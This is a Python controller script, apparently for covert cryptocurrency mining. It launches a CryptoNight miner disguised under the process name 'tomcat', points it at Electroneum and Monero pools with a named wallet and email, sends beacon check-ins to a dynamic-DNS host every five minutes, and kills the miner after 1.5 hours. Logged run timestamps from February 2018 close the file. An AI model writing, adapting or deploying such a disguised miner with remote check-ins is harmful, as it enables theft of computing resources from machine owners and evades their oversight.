import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:05.997188
#2018-02-17 16:20:06.401227
#2018-02-17 18:08:01.404691
#2018-02-17 19:55:06.558208
#2018-02-17 21:42:01.921944
#2018-02-17 23:26:06.812080
#2018-02-18 01:16:07.579083
#2018-02-18 03:03:05.443470
#2018-02-18 04:52:01.378126
#2018-02-18 06:44:01.985138
#2018-02-18 08:32:03.870644
#2018-02-18 10:19:05.116735
#2018-02-18 12:05:06.585926
#2018-02-18 13:50:01.873108
#2018-02-18 15:40:07.008777
#2018-02-18 17:29:04.784667
#2018-02-18 19:16:06.923948
#2018-02-18 21:02:03.383449
#2018-02-18 22:48:06.335207
#2018-02-19 00:37:01.562383
#2018-02-19 02:22:06.853723
#2018-02-19 04:09:05.104205
#2018-02-19 05:53:03.747194
#2018-02-19 07:41:07.105181
#2018-02-19 09:30:10.024005
#2018-02-19 11:19:08.739745
#2018-02-19 13:07:07.647091
#2018-02-19 14:55:06.566171
#2018-02-19 16:42:08.537710
#2018-02-19 18:31:05.448451
#2018-02-19 20:17:03.995892
#2018-02-19 22:05:08.602611
#2018-02-19 23:50:07.500393
#2018-02-20 01:36:05.861551
#2018-02-20 03:24:07.574319
#2018-02-20 05:11:06.996787
#2018-02-20 06:54:01.954015
#2018-02-20 08:40:06.840032
#2018-02-20 10:24:07.612681
#2018-02-20 12:09:06.001010
#2018-02-20 13:56:08.540870
#2018-02-20 15:40:06.197130
#2018-02-20 17:24:06.820815
#2018-02-20 19:14:09.440279
#2018-02-20 21:04:01.734984
#2018-02-20 22:50:02.229226
#2018-02-21 00:36:04.472395
#2018-02-21 03:30:05.019812
#2018-02-21 05:18:07.421609
#2018-02-21 07:06:06.801443
#2018-02-21 08:52:04.669843
#2018-02-21 10:40:05.643129
#2018-02-21 12:29:01.586241
#2018-02-21 14:15:07.965786
#2018-02-21 16:02:09.018925
#2018-02-21 17:54:04.930305
#2018-02-21 19:42:01.741798
#2018-02-21 21:29:04.272104
#2018-02-21 23:15:09.305255
#2018-02-22 01:05:06.987429
#2018-02-22 02:54:01.731636
#2018-02-22 04:41:05.330626
#2018-02-22 06:25:08.212502
#2018-02-22 08:13:01.697982
#2018-02-22 10:02:07.660040
#2018-02-22 11:46:04.902412
#2018-02-22 13:31:01.872296
#2018-02-22 15:20:04.146811
#2018-02-22 17:05:09.251051
#2018-02-22 18:52:03.746204
#2018-02-22 20:43:06.362908
#2018-02-22 22:30:09.298533
#2018-02-23 00:15:10.001109
#2018-02-23 02:06:01.825751
#2018-02-23 03:54:02.203410
#2018-02-23 05:42:03.953186
#2018-02-23 07:26:07.656453
#2018-02-23 09:29:06.853930
#2018-02-23 11:34:09.607300
#2018-02-23 13:25:01.637904
#2018-02-23 15:10:12.774826
#2018-02-23 17:00:12.718570
#2018-02-23 18:48:10.022619
#2018-02-23 20:33:07.548471
#2018-02-23 22:21:04.234129
#2018-02-24 00:07:01.408257
#2018-02-24 01:57:06.607841
#2018-02-24 03:48:04.601986
#2018-02-24 05:35:02.740141
#2018-02-24 07:21:01.597865
#2018-02-24 09:11:06.118299
#2018-02-24 11:06:08.057801
#2018-02-24 12:54:07.838550
#2018-02-24 14:42:06.391424
#2018-02-24 16:33:03.836244
#2018-02-24 18:22:07.243077
#2018-02-24 20:08:06.532784
#2018-02-24 21:51:05.503077
#2018-02-25 00:51:06.818718
#2018-02-25 04:39:05.848493
#2018-02-25 08:05:08.033934